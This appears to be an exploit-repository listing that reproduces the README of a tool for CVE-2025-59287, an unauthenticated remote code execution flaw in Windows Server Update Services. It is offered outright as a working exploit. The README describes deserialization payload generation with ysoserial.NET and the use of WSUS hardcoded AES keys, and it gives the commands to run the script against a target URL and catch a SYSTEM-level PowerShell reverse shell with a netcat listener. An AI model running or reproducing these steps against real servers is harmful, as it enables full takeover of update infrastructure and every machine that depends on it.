CVE-2025-59287 PoC — Windows Server Update Service (WSUS) Remote Code Execution Vulnerability

Source

Associated Vulnerability

Description

It is an Working exploit of new CVE found in WSUS.

Readme

# CVE-2025-59287 WSUS RCE Exploit

Automated exploit for Windows Server Update Services (WSUS) unauthenticated remote code execution vulnerability.

## Vulnerability Details

- **CVE ID:** CVE-2025-59287
- **CVSS Score:** 9.8 (Critical)
- **Attack Vector:** Network
- **Authentication:** None required
- **Impact:** Remote Code Execution as SYSTEM

## Features

✅ Fully automated payload generation  
✅ Auto-downloads ysoserial.NET dependency  
✅ Built-in reverse shell listener  
✅ Cross-platform support (Windows/Linux/Mac)  
✅ AES encryption with WSUS hardcoded keys  
✅ PowerShell reverse shell payload

## Requirements

pip install -r requirements.txt

### Python Dependencies

### .NET Runtime (Auto-detected)
- **Windows:** .NET Framework (built-in)
- **Linux/Mac:** Wine or Mono
Ubuntu/Debian

sudo apt install wine-stable

sudo apt install mono-complete


## Installation

Clone or download exploit files

cd CVE-2025-59287-exploit

Run exploit (auto-downloads ysoserial.NET)

python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444


## Usage

### Basic Exploitation

python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

### if want session on another listener

Terminal 1: Start netcat listener

nc -lvnp 4444

Terminal 2: Run exploit without built-in listener

python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

File Snapshot

 [4.0K]  /data/pocs/5d65583f20608faba62fd7f5da38274570bdcc49
├── [ 12K]  CVE-2025-59287.py
├── [1.4K]  README.md
└── [  56]  requirements.txt

1 directory, 3 files

Remarks